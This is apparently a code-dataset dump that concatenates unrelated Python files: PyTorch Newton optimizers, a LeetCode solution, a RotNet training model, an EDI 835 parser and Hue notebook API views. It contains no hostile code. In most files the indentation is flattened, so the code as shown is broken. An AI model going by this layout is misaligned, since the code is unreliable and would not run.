rs_new = dot(r, r)
p.mul_(rs_new / rs).sub_(r)
rs = rs_new
else:
        # loop exhausted max_iter without meeting the residual tolerance
maxiter_reached = True
return x, n_iter, maxiter_reached
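# Minimal sketch of the CG sub-problem above on an explicit 2x2 SPD matrix
# (illustration only; inside the solvers `hess` is a linear operator built by
# ScalarFunction that exposes `.mv()`):
#     class _DenseHess:
#         def __init__(self, A): self.A = A
#         def mv(self, v): return self.A.mv(v)
#     A = torch.tensor([[3., 1.], [1., 2.]])
#     g = torch.tensor([1., -1.])
#     d, iters, failed = _cg_iters(g, _DenseHess(A), max_iter=10)
#     # d approximately solves A @ d = -g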
@torch.no_grad()
def _minimize_newton_cg(
fun, x0, lr=1., max_iter=None, cg_max_iter=None,
twice_diffable=True, line_search='strong-wolfe', xtol=1e-16,
normp=1, callback=None, disp=0, return_all=False):
"""Minimize a scalar function of one or more variables using the
Newton-Raphson method, with Conjugate Gradient for the linear inverse
sub-problem.
Parameters
----------
fun : callable
Scalar objective function to minimize.
x0 : Tensor
Initialization point.
lr : float
Step size for parameter updates. If using line search, this will be
used as the initial step size for the search.
max_iter : int, optional
Maximum number of iterations to perform. Defaults to
``200 * x0.numel()``.
cg_max_iter : int, optional
Maximum number of iterations for CG subproblem. Recommended to
leave this at the default of ``20 * x0.numel()``.
twice_diffable : bool
Whether to assume the function is twice continuously differentiable.
If True, hessian-vector products will be much faster.
line_search : str
Line search specifier. Currently the available options are
{'none', 'strong_wolfe'}.
xtol : float
Average relative error in solution `xopt` acceptable for
convergence.
normp : Number or str
The norm type to use for termination conditions. Can be any value
supported by :func:`torch.norm`.
callback : callable, optional
Function to call after each iteration with the current parameter
state, e.g. ``callback(x)``.
disp : int or bool
Display (verbosity) level. Set to >0 to print status messages.
return_all : bool
Set to True to return a list of the best solution at each of the
iterations.
Returns
-------
result : OptimizeResult
Result of the optimization routine.
"""
lr = float(lr)
disp = int(disp)
xtol = x0.numel() * xtol
if max_iter is None:
max_iter = x0.numel() * 200
if cg_max_iter is None:
cg_max_iter = x0.numel() * 20
# construct scalar objective function
sf = ScalarFunction(fun, x0.shape, hessp=True, twice_diffable=twice_diffable)
closure = sf.closure
if line_search == 'strong-wolfe':
dir_evaluate = sf.dir_evaluate
# initial settings
x = x0.detach().clone(memory_format=torch.contiguous_format)
f, g, hessp, _ = closure(x)
if disp > 1:
print('initial fval: %0.4f' % f)
if return_all:
allvecs = [x]
ncg = 0 # number of cg iterations
n_iter = 0
# begin optimization loop
for n_iter in range(1, max_iter + 1):
# ============================================================
# Compute a search direction pk by applying the CG method to
# H_f(xk) p = - J_f(xk) starting from 0.
# ============================================================
        # Compute search direction with conjugate gradient (CG)
d, cg_iters, cg_fail = _cg_iters(g, hessp, cg_max_iter, normp)
ncg += cg_iters
if cg_fail:
warnflag = 3
msg = _status_message['cg_warn']
break
# =====================================================
# Perform variable update (with optional line search)
# =====================================================
if line_search == 'none':
update = d.mul(lr)
x = x + update
elif line_search == 'strong-wolfe':
# strong-wolfe line search
_, _, t, ls_nevals = strong_wolfe(dir_evaluate, x, lr, d, f, g)
update = d.mul(t)
x = x + update
else:
raise ValueError('invalid line_search option {}.'.format(line_search))
# re-evaluate function
f, g, hessp, _ = closure(x)
if disp > 1:
print('iter %3d - fval: %0.4f' % (n_iter, f))
if callback is not None:
callback(x)
if return_all:
allvecs.append(x)
# ==========================
# check for convergence
# ==========================
if update.norm(p=normp) <= xtol:
warnflag = 0
msg = _status_message['success']
break
if not f.isfinite():
warnflag = 3
msg = _status_message['nan']
break
else:
# if we get to the end, the maximum num. iterations was reached
warnflag = 1
msg = _status_message['maxiter']
if disp:
print(msg)
print(" Current function value: %f" % f)
print(" Iterations: %d" % n_iter)
print(" Function evaluations: %d" % sf.nfev)
print(" CG iterations: %d" % ncg)
result = OptimizeResult(fun=f, x=x.view_as(x0), grad=g.view_as(x0),
status=warnflag, success=(warnflag==0),
message=msg, nit=n_iter, nfev=sf.nfev, ncg=ncg)
if return_all:
result['allvecs'] = allvecs
return result
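# Hedged end-to-end sketch (assumes the package's public `minimize` wrapper
# dispatches to this routine for method='newton-cg'; treat the import path and
# method name as assumptions rather than confirmed API):
#     import torch
#     from torchmin import minimize
#     rosen = lambda x: (100 * (x[1:] - x[:-1] ** 2) ** 2 + (1 - x[:-1]) ** 2).sum()
#     res = minimize(rosen, torch.zeros(5), method='newton-cg')
#     # res.x should approach the all-ones minimizer of the Rosenbrock function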
@torch.no_grad()
def _minimize_newton_exact(
fun, x0, lr=1., max_iter=None, line_search='strong-wolfe', xtol=1e-16,
normp=1, tikhonov=0., handle_npd='grad', callback=None, disp=0,
return_all=False):
"""Minimize a scalar function of one or more variables using the
Newton-Raphson method.
This variant uses an "exact" Newton routine based on Cholesky factorization
of the explicit Hessian matrix.
Parameters
----------
fun : callable
Scalar objective function to minimize.
x0 : Tensor
Initialization point.
lr : float
Step size for parameter updates. If using line search, this will be
used as the initial step size for the search.
max_iter : int, optional
Maximum number of iterations to perform. Defaults to
``200 * x0.numel()``.
line_search : str
Line search specifier. Currently the available options are
{'none', 'strong_wolfe'}.
xtol : float
Average relative error in solution `xopt` acceptable for
convergence.
normp : Number or str
The norm type to use for termination conditions. Can be any value
supported by :func:`torch.norm`.
tikhonov : float
Optional diagonal regularization (Tikhonov) parameter for the Hessian.
handle_npd : str
Mode for handling non-positive definite hessian matrices. Can be one
of the following:
* 'grad' : use steepest descent direction (gradient)
* 'lu' : solve the inverse hessian with LU factorization
* 'eig' : use symmetric eigendecomposition to determine a
diagonal regularization parameter
callback : callable, optional
Function to call after each iteration with the current parameter
state, e.g. ``callback(x)``.
disp : int or bool
Display (verbosity) level. Set to >0 to print status messages.
return_all : bool
Set to True to return a list of the best solution at each of the
iterations.
Returns
-------
result : OptimizeResult
Result of the optimization routine.
"""
lr = float(lr)
disp = int(disp)
xtol = x0.numel() * xtol
if max_iter is None:
max_iter = x0.numel() * 200
# Construct scalar objective function
sf = ScalarFunction(fun, x0.shape, hess=True)
closure = sf.closure
if line_search == 'strong-wolfe':
dir_evaluate = sf.dir_evaluate
# initial settings
x = x0.detach().view(-1).clone(memory_format=torch.contiguous_format)
f, g, _, hess = closure(x)
if tikhonov > 0:
hess.diagonal().add_(tikhonov)
if disp > 1:
print('initial fval: %0.4f' % f)
if return_all:
allvecs = [x]
nfail = 0
n_iter = 0
# begin optimization loop
for n_iter in range(1, max_iter + 1):
# ==================================================
# Compute a search direction d by solving
# H_f(x) d = - J_f(x)
# with the true Hessian and Cholesky factorization
# ===================================================
# Compute search direction with Cholesky solve
L, info = torch.linalg.cholesky_ex(hess)
if info == 0:
d = torch.cholesky_solve(g.neg().unsqueeze(1), L).squeeze(1)
else:
nfail += 1
if handle_npd == 'lu':
d = torch.linalg.solve(hess, g.neg())
elif handle_npd == 'grad':
d = g.neg()
elif handle_npd == 'cauchy':
gnorm = g.norm(p=2)
scale = 1 / gnorm
gHg = g.dot(hess.mv(g))
if gHg > 0:
scale *= torch.clamp_max_(gnorm.pow(3) / gHg, max=1)
d = scale * g.neg()
elif handle_npd == 'eig':
# this setting is experimental! use with caution
# TODO: why chose the factor 1.5 here? Seems to work best
eig0 = eigsh(hess.cpu().numpy(), k=1, which="SA", tol=1e-4,
return_eigenvectors=False).item()
tau = max(1e-3 - 1.5 * eig0, 0)
hess.diagonal().add_(tau)
d = torch.cholesky_solve(g.neg().unsqueeze(1),
torch.linalg.cholesky(hess)).squeeze(1)
else:
raise RuntimeError('invalid handle_npd encountered.')
# =====================================================
# Perform variable update (with optional line search)
# =====================================================
if line_search == 'none':
update = d.mul(lr)
x = x + update
elif line_search == 'strong-wolfe':
# strong-wolfe line search
_, _, t, ls_nevals = strong_wolfe(dir_evaluate, x, lr, d, f, g)
update = d.mul(t)
x = x + update
else:
raise ValueError('invalid line_search option {}.'.format(line_search))
# ===================================
# Re-evaluate func/Jacobian/Hessian
# ===================================
f, g, _, hess = closure(x)
if tikhonov > 0:
hess.diagonal().add_(tikhonov)
if disp > 1:
print('iter %3d - fval: %0.4f - info: %d' % (n_iter, f, info))
if callback is not None:
callback(x)
if return_all:
allvecs.append(x)
# ==========================
# check for convergence
# ==========================
if update.norm(p=normp) <= xtol:
warnflag = 0
msg = _status_message['success']
break
if not f.isfinite():
warnflag = 3
msg = _status_message['nan']
break
else:
# if we get to the end, the maximum num. iterations was reached
warnflag = 1
msg = _status_message['maxiter']
if disp:
print(msg)
print(" Current function value: %f" % f)
print(" Iterations: %d" % n_iter)
print(" Function evaluations: %d" % sf.nfev)
result = OptimizeResult(fun=f, x=x.view_as(x0), grad=g.view_as(x0),
hess=hess.view(*x0.shape, *x0.shape),
status=warnflag, success=(warnflag==0),
message=msg, nit=n_iter, nfev=sf.nfev, nfail=nfail)
if return_all:
result['allvecs'] = allvecs
return result
| 34.475124
| 82
| 0.544484
|
b7e9b2790a35f45f900adc2f88d72bc893f47284
| 343
|
py
|
Python
|
Leetcode/0377. Combination Sum IV/0377.py
|
Next-Gen-UI/Code-Dynamics
|
a9b9d5e3f27e870b3e030c75a1060d88292de01c
|
[
"MIT"
] | null | null | null |
Leetcode/0377. Combination Sum IV/0377.py
|
Next-Gen-UI/Code-Dynamics
|
a9b9d5e3f27e870b3e030c75a1060d88292de01c
|
[
"MIT"
] | null | null | null |
Leetcode/0377. Combination Sum IV/0377.py
|
Next-Gen-UI/Code-Dynamics
|
a9b9d5e3f27e870b3e030c75a1060d88292de01c
|
[
"MIT"
] | null | null | null |
class Solution:
def combinationSum4(self, nums: List[int], target: int) -> int:
dp = [1] + [-1] * target
def dfs(target: int) -> int:
if target < 0:
return 0
if dp[target] != -1:
return dp[target]
dp[target] = sum(dfs(target - num) for num in nums)
return dp[target]
return dfs(target)
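# Example from the problem statement (illustration only): nums = [1, 2, 3] and
# target = 4 admit 7 ordered combinations, so
# Solution().combinationSum4([1, 2, 3], 4) == 7.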
| 22.866667
| 65
| 0.556851
|
4c64c84b4cd14435d519aaa5cc736e685ec2a153
| 3,237
|
py
|
Python
|
algorithms/ClassificationModel.py
|
ChenDarYen/FeatureLearningRotNet
|
5653d8c370fa1feded5d26156f452e83faad8287
|
[
"MIT"
] | null | null | null |
algorithms/ClassificationModel.py
|
ChenDarYen/FeatureLearningRotNet
|
5653d8c370fa1feded5d26156f452e83faad8287
|
[
"MIT"
] | null | null | null |
algorithms/ClassificationModel.py
|
ChenDarYen/FeatureLearningRotNet
|
5653d8c370fa1feded5d26156f452e83faad8287
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
import numpy as np
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.optim
import os
import torchnet as tnt
import utils
import PIL
import pickle
from tqdm import tqdm
import time
from . import Algorithm
from pdb import set_trace as breakpoint
def accuracy(output, target, topk=(1,)):
"""Computes the precision@k for the specified values of k"""
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].view(-1).float().sum(0)
res.append(correct_k / batch_size)
return res
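# Quick illustration (hypothetical numbers): for a batch of 4 samples whose
# top-scoring class matches the target on 3 of them, accuracy(output, target,
# topk=(1,)) returns [0.75] -- fractions of the batch, not percentages.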
class ClassificationModel(Algorithm):
def __init__(self, opt):
Algorithm.__init__(self, opt)
def allocate_tensors(self):
self.tensors = {}
self.tensors['dataX'] = torch.FloatTensor()
self.tensors['labels'] = torch.LongTensor()
def train_step(self, batch):
return self.process_batch(batch, do_train=True)
def evaluation_step(self, batch):
return self.process_batch(batch, do_train=False)
def process_batch(self, batch, do_train=True):
#*************** LOAD BATCH (AND MOVE IT TO GPU) ********
start = time.time()
self.tensors['dataX'].resize_(batch[0].size()).copy_(batch[0])
self.tensors['labels'].resize_(batch[1].size()).copy_(batch[1])
dataX = self.tensors['dataX']
labels = self.tensors['labels']
batch_load_time = time.time() - start
#********************************************************
#********************************************************
start = time.time()
if do_train: # zero the gradients
self.optimizers['model'].zero_grad()
#********************************************************
#***************** SET TORCH VARIABLES ******************
dataX_var = torch.autograd.Variable(dataX, volatile=(not do_train))
labels_var = torch.autograd.Variable(labels, requires_grad=False)
#********************************************************
#************ FORWARD THROUGH NET ***********************
pred_var = self.networks['model'](dataX_var)
#********************************************************
#*************** COMPUTE LOSSES *************************
record = {}
loss_total = self.criterions['loss'](pred_var, labels_var)
record['prec1'] = accuracy(pred_var.data, labels, topk=(1,))[0].item()
record['loss'] = loss_total.data.item()
#********************************************************
#****** BACKPROPAGATE AND APPLY OPTIMIZATION STEP *******
if do_train:
loss_total.backward()
self.optimizers['model'].step()
#********************************************************
batch_process_time = time.time() - start
total_time = batch_process_time + batch_load_time
record['load_time'] = 100*(batch_load_time/total_time)
record['process_time'] = 100*(batch_process_time/total_time)
return record
| 34.806452
| 78
| 0.525795
|
6983eac9f52df8165d72ac2239636c4c6c7e1f84
| 315
|
py
|
Python
|
edi_835_parser/elements/service_modifier1.py
|
shalini1017/edi-835-parser
|
5c7c9549621a71cea893b37998e4bdea94822c5c
|
[
"MIT"
] | null | null | null |
edi_835_parser/elements/service_modifier1.py
|
shalini1017/edi-835-parser
|
5c7c9549621a71cea893b37998e4bdea94822c5c
|
[
"MIT"
] | null | null | null |
edi_835_parser/elements/service_modifier1.py
|
shalini1017/edi-835-parser
|
5c7c9549621a71cea893b37998e4bdea94822c5c
|
[
"MIT"
] | null | null | null |
from typing import Optional
from edi_835_parser.elements import Element
from edi_835_parser.elements.utilities import split_element
class ServiceModifier1(Element):
def parser(self, value: str) -> Optional[str]:
if value is not None:
value = split_element(value)
if len(value) > 2:
return value[2]
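# Hedged illustration (assumes split_element splits on the ':' composite separator
# used in 835 SVC segments): for a value like 'HC:99213:25', parser() would return
# '25', i.e. the first service modifier; shorter composites yield None.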
| 22.5
| 59
| 0.75873
|
73d58b8c794c4b1591d1846b3827ad2b0454e1b4
| 19,958
|
py
|
Python
|
desktop/libs/notebook/src/notebook/api.py
|
ShahabT/hue
|
88f5a64c118385e8f4ac413e2f8ea1fd06f14094
|
[
"Apache-2.0"
] | null | null | null |
desktop/libs/notebook/src/notebook/api.py
|
ShahabT/hue
|
88f5a64c118385e8f4ac413e2f8ea1fd06f14094
|
[
"Apache-2.0"
] | null | null | null |
desktop/libs/notebook/src/notebook/api.py
|
ShahabT/hue
|
88f5a64c118385e8f4ac413e2f8ea1fd06f14094
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging
from django.core.urlresolvers import reverse
from django.forms import ValidationError
from django.http import HttpResponseBadRequest, HttpResponseRedirect
from django.utils.translation import ugettext as _
from django.views.decorators.http import require_GET, require_POST
from desktop.lib.django_util import JsonResponse
from desktop.models import Document2, Document
from notebook.connectors.base import get_api, Notebook, QueryExpired, SessionExpired
from notebook.decorators import api_error_handler, check_document_access_permission, check_document_modify_permission
from notebook.github import GithubClient
from notebook.models import escape_rows
from notebook.views import upgrade_session_properties
LOG = logging.getLogger(__name__)
DEFAULT_HISTORY_NAME = ''
@require_POST
@api_error_handler
def create_notebook(request):
response = {'status': -1}
editor_type = request.POST.get('type', 'notebook')
directory_uuid = request.POST.get('directory_uuid')
editor = Notebook()
data = editor.get_data()
if editor_type != 'notebook':
data['name'] = ''
data['type'] = 'query-%s' % editor_type # TODO: Add handling for non-SQL types
data['directoryUuid'] = directory_uuid
editor.data = json.dumps(data)
response['notebook'] = editor.get_data()
response['status'] = 0
return JsonResponse(response)
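# Illustrative response shape (hypothetical values): POSTing type='hive' and a
# directory_uuid to this endpoint returns
#   {'status': 0, 'notebook': {'type': 'query-hive', 'directoryUuid': ..., ...}}
# where the notebook payload comes from Notebook().get_data().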
@require_POST
@check_document_access_permission()
@api_error_handler
def create_session(request):
response = {'status': -1}
notebook = json.loads(request.POST.get('notebook', '{}'))
session = json.loads(request.POST.get('session', '{}'))
properties = session.get('properties', [])
response['session'] = get_api(request, session).create_session(lang=session['type'], properties=properties)
response['status'] = 0
return JsonResponse(response)
@require_POST
@check_document_access_permission()
@api_error_handler
def close_session(request):
response = {'status': -1}
session = json.loads(request.POST.get('session', '{}'))
response['session'] = get_api(request, {'type': session['type']}).close_session(session=session)
response['status'] = 0
return JsonResponse(response)
@require_POST
@check_document_access_permission()
@api_error_handler
def execute(request):
response = {'status': -1}
result = None
notebook = json.loads(request.POST.get('notebook', '{}'))
snippet = json.loads(request.POST.get('snippet', '{}'))
try:
response['handle'] = get_api(request, snippet).execute(notebook, snippet)
# Retrieve and remove the result from the handle
if response['handle'].get('sync'):
result = response['handle'].pop('result')
finally:
if notebook['type'].startswith('query-'):
_snippet = [s for s in notebook['snippets'] if s['id'] == snippet['id']][0]
if 'handle' in response: # No failure
_snippet['result']['handle'] = response['handle']
_snippet['result']['statements_count'] = response['handle'].get('statements_count', 1)
_snippet['result']['statement_id'] = response['handle'].get('statement_id', 0)
_snippet['result']['handle']['statement'] = response['handle'].get('statement', snippet['statement']) # For non HS2, as non multi query yet
else:
_snippet['status'] = 'failed'
history = _historify(notebook, request.user)
response['history_id'] = history.id
response['history_uuid'] = history.uuid
if notebook['isSaved']: # Keep track of history of saved queries
response['history_parent_uuid'] = history.dependencies.filter(type__startswith='query-').latest('last_modified').uuid
# Inject and HTML escape results
if result is not None:
response['result'] = result
response['result']['data'] = escape_rows(result['data'])
response['status'] = 0
return JsonResponse(response)
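# Illustrative response shape (hypothetical values): a successful asynchronous
# statement returns {'status': 0, 'handle': {...}, 'history_id': ..., 'history_uuid': ...};
# when the connector reports handle['sync'] the rows are popped from the handle and
# returned inline under response['result'] with HTML-escaped data.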
@require_POST
@check_document_access_permission()
@api_error_handler
def check_status(request):
response = {'status': -1}
notebook = json.loads(request.POST.get('notebook', '{}'))
snippet = json.loads(request.POST.get('snippet', '{}'))
if not snippet:
nb_doc = Document2.objects.get_by_uuid(user=request.user, uuid=notebook['id'])
notebook = Notebook(document=nb_doc).get_data()
snippet = notebook['snippets'][0]
try:
response['query_status'] = get_api(request, snippet).check_status(notebook, snippet)
response['status'] = 0
except SessionExpired:
response['status'] = 'expired'
raise
except QueryExpired:
response['status'] = 'expired'
raise
finally:
if response['status'] == 0 and snippet['status'] != response['query_status']:
status = response['query_status']['status']
elif response['status'] == 'expired':
status = 'expired'
else:
status = 'failed'
if notebook['type'].startswith('query'):
nb_doc = Document2.objects.get(id=notebook['id'])
nb_doc.can_write_or_exception(request.user)
nb = Notebook(document=nb_doc).get_data()
nb['snippets'][0]['status'] = status
nb_doc.update_data(nb)
nb_doc.save()
return JsonResponse(response)
@require_POST
@check_document_access_permission()
@api_error_handler
def fetch_result_data(request):
response = {'status': -1}
notebook = json.loads(request.POST.get('notebook', '{}'))
snippet = json.loads(request.POST.get('snippet', '{}'))
  rows = json.loads(request.POST.get('rows', '100'))
  start_over = json.loads(request.POST.get('startOver', 'false'))
response['result'] = get_api(request, snippet).fetch_result(notebook, snippet, rows, start_over)
# Materialize and HTML escape results
if response['result'].get('data') and response['result'].get('type') == 'table':
response['result']['data'] = escape_rows(response['result']['data'])
response['status'] = 0
return JsonResponse(response)
@require_POST
@check_document_access_permission()
@api_error_handler
def fetch_result_metadata(request):
response = {'status': -1}
notebook = json.loads(request.POST.get('notebook', '{}'))
snippet = json.loads(request.POST.get('snippet', '{}'))
response['result'] = get_api(request, snippet).fetch_result_metadata(notebook, snippet)
response['status'] = 0
return JsonResponse(response)
@require_POST
@check_document_access_permission()
@api_error_handler
def cancel_statement(request):
response = {'status': -1}
notebook = json.loads(request.POST.get('notebook', '{}'))
snippet = json.loads(request.POST.get('snippet', '{}'))
response['result'] = get_api(request, snippet).cancel(notebook, snippet)
response['status'] = 0
return JsonResponse(response)
@require_POST
@check_document_access_permission()
@api_error_handler
def get_logs(request):
response = {'status': -1}
notebook = json.loads(request.POST.get('notebook', '{}'))
snippet = json.loads(request.POST.get('snippet', '{}'))
startFrom = request.POST.get('from')
startFrom = int(startFrom) if startFrom else None
size = request.POST.get('size')
size = int(size) if size else None
db = get_api(request, snippet)
logs = db.get_log(notebook, snippet, startFrom=startFrom, size=size)
jobs = json.loads(request.POST.get('jobs', '[]'))
# Get any new jobs from current logs snippet
new_jobs = db.get_jobs(notebook, snippet, logs)
# Append new jobs to known jobs and get the unique set
if new_jobs:
all_jobs = jobs + new_jobs
jobs = dict((job['name'], job) for job in all_jobs).values()
# Retrieve full log for job progress parsing
full_log = request.POST.get('full_log', logs)
response['logs'] = logs
response['progress'] = db.progress(snippet, full_log) if snippet['status'] != 'available' and snippet['status'] != 'success' else 100
response['jobs'] = jobs
response['status'] = 0
return JsonResponse(response)
@require_POST
@check_document_modify_permission()
def save_notebook(request):
response = {'status': -1}
notebook = json.loads(request.POST.get('notebook', '{}'))
notebook_type = notebook.get('type', 'notebook')
if notebook.get('parentSavedQueryUuid'): # We save into the original saved query, not into the query history
notebook_doc = Document2.objects.get_by_uuid(user=request.user, uuid=notebook['parentSavedQueryUuid'])
elif notebook.get('id'):
notebook_doc = Document2.objects.get(id=notebook['id'])
else:
notebook_doc = Document2.objects.create(name=notebook['name'], uuid=notebook['uuid'], type=notebook_type, owner=request.user)
Document.objects.link(notebook_doc, owner=notebook_doc.owner, name=notebook_doc.name, description=notebook_doc.description, extra=notebook_type)
if notebook.get('directoryUuid'):
notebook_doc.parent_directory = Document2.objects.get_by_uuid(user=request.user, uuid=notebook.get('directoryUuid'), perm_type='write')
else:
notebook_doc.parent_directory = Document2.objects.get_home_directory(request.user)
notebook['isSaved'] = True
notebook['isHistory'] = False
notebook['id'] = notebook_doc.id
notebook_doc1 = notebook_doc.doc.get()
notebook_doc.update_data(notebook)
notebook_doc.name = notebook_doc1.name = notebook['name']
notebook_doc.description = notebook_doc1.description = notebook['description']
notebook_doc.save()
notebook_doc1.save()
response['status'] = 0
response['id'] = notebook_doc.id
response['message'] = request.POST.get('editorMode') == 'true' and _('Query saved successfully') or _('Notebook saved successfully')
return JsonResponse(response)
def _historify(notebook, user):
query_type = notebook['type']
name = notebook['name'] if (notebook['name'] and notebook['name'].strip() != '') else DEFAULT_HISTORY_NAME
history_doc = Document2.objects.create(
name=name,
type=query_type,
owner=user,
is_history=True
)
# Link history of saved query
if notebook['isSaved']:
parent_doc = Document2.objects.get(uuid=notebook.get('parentSavedQueryUuid') or notebook['uuid']) # From previous history query or initial saved query
notebook['parentSavedQueryUuid'] = parent_doc.uuid
history_doc.dependencies.add(parent_doc)
Document.objects.link(
history_doc,
name=history_doc.name,
owner=history_doc.owner,
description=history_doc.description,
extra=query_type
)
notebook['uuid'] = history_doc.uuid
history_doc.update_data(notebook)
history_doc.save()
return history_doc
@require_GET
@api_error_handler
@check_document_access_permission()
def get_history(request):
response = {'status': -1}
doc_type = request.GET.get('doc_type')
  limit = min(int(request.GET.get('len', 50)), 100)
response['status'] = 0
history = []
for doc in Document2.objects.get_history(doc_type='query-%s' % doc_type, user=request.user).order_by('-last_modified')[:limit]:
notebook = Notebook(document=doc).get_data()
if 'snippets' in notebook:
try:
statement = notebook['snippets'][0]['result']['handle']['statement']
if type(statement) == dict: # Old format
statement = notebook['snippets'][0]['statement_raw']
except KeyError: # Old format
statement = notebook['snippets'][0]['statement_raw']
history.append({
'name': doc.name,
'id': doc.id,
'uuid': doc.uuid,
'type': doc.type,
'data': {
'statement': statement[:1001],
'lastExecuted': notebook['snippets'][0]['lastExecuted'],
'status': notebook['snippets'][0]['status'],
'parentSavedQueryUuid': notebook.get('parentSavedQueryUuid', '')
} if notebook['snippets'] else {},
'absoluteUrl': doc.get_absolute_url(),
})
else:
LOG.error('Incomplete History Notebook: %s' % notebook)
response['history'] = history
response['message'] = _('History fetched')
return JsonResponse(response)
@require_POST
@api_error_handler
@check_document_modify_permission()
def clear_history(request):
response = {'status': -1}
  notebook = json.loads(request.POST.get('notebook', '{}'))
doc_type = request.POST.get('doc_type')
history = Document2.objects.get_history(doc_type='query-%s' % doc_type, user=request.user)
response['updated'] = history.delete()
  response['message'] = _('History cleared!')
response['status'] = 0
return JsonResponse(response)
@require_GET
@check_document_access_permission()
def open_notebook(request):
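  """Load a notebook document by id, upgrade its session properties and return its JSON representation."""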
response = {'status': -1}
notebook_id = request.GET.get('notebook')
notebook = Notebook(document=Document2.objects.get(id=notebook_id))
notebook = upgrade_session_properties(request, notebook)
response['status'] = 0
response['notebook'] = notebook.get_json()
  response['message'] = _('Notebook loaded successfully')
  return JsonResponse(response)
@require_POST
@check_document_access_permission()
def close_notebook(request):
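  """Close the Spark sessions and Hive/Impala statements attached to the notebook."""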
response = {'status': -1, 'result': []}
notebook = json.loads(request.POST.get('notebook', '{}'))
for session in [_s for _s in notebook['sessions'] if _s['type'] in ('scala', 'spark', 'pyspark', 'sparkr')]:
try:
response['result'].append(get_api(request, session).close_session(session))
except QueryExpired:
pass
    except Exception as e:
LOG.exception('Error closing session %s' % str(e))
for snippet in [_s for _s in notebook['snippets'] if _s['type'] in ('hive', 'impala')]:
try:
response['result'] = get_api(request, snippet).close_statement(snippet)
except QueryExpired:
pass
    except Exception as e:
LOG.exception('Error closing statement %s' % str(e))
response['status'] = 0
response['message'] = _('Notebook closed successfully')
return JsonResponse(response)
@require_POST
@check_document_access_permission()
def close_statement(request):
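  """Close the statement of the given snippet, ignoring queries that have already expired."""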
response = {'status': -1}
# Passed by check_document_access_permission but unused by APIs
notebook = json.loads(request.POST.get('notebook', '{}'))
snippet = json.loads(request.POST.get('snippet', '{}'))
try:
response['result'] = get_api(request, snippet).close_statement(snippet)
except QueryExpired:
pass
response['status'] = 0
response['message'] = _('Statement closed !')
return JsonResponse(response)
@require_POST
@check_document_access_permission()
@api_error_handler
def autocomplete(request, server=None, database=None, table=None, column=None, nested=None):
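  """Return autocompletion metadata for the snippet's engine at the requested database, table, column or nested level."""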
response = {'status': -1}
# Passed by check_document_access_permission but unused by APIs
notebook = json.loads(request.POST.get('notebook', '{}'))
snippet = json.loads(request.POST.get('snippet', '{}'))
try:
autocomplete_data = get_api(request, snippet).autocomplete(snippet, database, table, column, nested)
response.update(autocomplete_data)
except QueryExpired:
pass
response['status'] = 0
return JsonResponse(response)
@require_POST
@check_document_access_permission()
@api_error_handler
def get_sample_data(request, server=None, database=None, table=None, column=None):
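  """Return sample data for the requested database, table or column using the snippet's API."""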
response = {'status': -1}
# Passed by check_document_access_permission but unused by APIs
notebook = json.loads(request.POST.get('notebook', '{}'))
snippet = json.loads(request.POST.get('snippet', '{}'))
sample_data = get_api(request, snippet).get_sample_data(snippet, database, table, column)
response.update(sample_data)
response['status'] = 0
return JsonResponse(response)
@require_POST
@check_document_access_permission()
@api_error_handler
def explain(request):
response = {'status': -1}
notebook = json.loads(request.POST.get('notebook', '{}'))
snippet = json.loads(request.POST.get('snippet', '{}'))
response = get_api(request, snippet).explain(notebook, snippet)
return JsonResponse(response)
@require_GET
@api_error_handler
def github_fetch(request):
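  """Fetch the contents of a file from GitHub given its URL, returning parsed JSON when possible and plain text otherwise."""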
response = {'status': -1}
api = GithubClient(access_token=request.session.get('github_access_token'))
response['url'] = url = request.GET.get('url')
if url:
owner, repo, branch, filepath = api.parse_github_url(url)
content = api.get_file_contents(owner, repo, filepath, branch)
try:
response['content'] = json.loads(content)
except ValueError:
# Content is not JSON-encoded so return plain-text
response['content'] = content
response['status'] = 0
else:
return HttpResponseBadRequest(_('url param is required'))
return JsonResponse(response)
@api_error_handler
def github_authorize(request):
access_token = request.session.get('github_access_token')
if access_token and GithubClient.is_authenticated(access_token):
response = {
'status': 0,
'message': _('User is already authenticated to GitHub.')
}
return JsonResponse(response)
else:
auth_url = GithubClient.get_authorization_url()
request.session['github_callback_redirect'] = request.GET.get('currentURL')
request.session['github_callback_fetch'] = request.GET.get('fetchURL')
response = {
'status': -1,
'auth_url':auth_url
}
if (request.is_ajax()):
return JsonResponse(response)
return HttpResponseRedirect(auth_url)
@api_error_handler
def github_callback(request):
redirect_base = request.session['github_callback_redirect'] + "&github_status="
if 'code' in request.GET:
session_code = request.GET.get('code')
request.session['github_access_token'] = GithubClient.get_access_token(session_code)
return HttpResponseRedirect(redirect_base + "0&github_fetch=" + request.session['github_callback_fetch'])
else:
return HttpResponseRedirect(redirect_base + "-1&github_fetch=" + request.session['github_callback_fetch'])
@require_POST
@check_document_access_permission()
@api_error_handler
def export_result(request):
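  """Export the snippet's result to an HDFS file, a Hive table or an HDFS directory and return a URL to watch the operation."""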
response = {'status': -1, 'message': _('Exporting result failed.')}
# Passed by check_document_access_permission but unused by APIs
notebook = json.loads(request.POST.get('notebook', '{}'))
snippet = json.loads(request.POST.get('snippet', '{}'))
  data_format = json.loads(request.POST.get('format', '"hdfs-file"'))
  destination = json.loads(request.POST.get('destination', '""'))
  overwrite = json.loads(request.POST.get('overwrite', 'false'))
api = get_api(request, snippet)
if data_format == 'hdfs-file':
if overwrite and request.fs.exists(destination):
if request.fs.isfile(destination):
request.fs.do_as_user(request.user.username, request.fs.rmtree, destination)
else:
raise ValidationError(_("The target path is a directory"))
response['watch_url'] = api.export_data_as_hdfs_file(snippet, destination, overwrite)
response['status'] = 0
elif data_format == 'hive-table':
notebook_id = notebook['id'] or request.GET.get('editor', request.GET.get('notebook'))
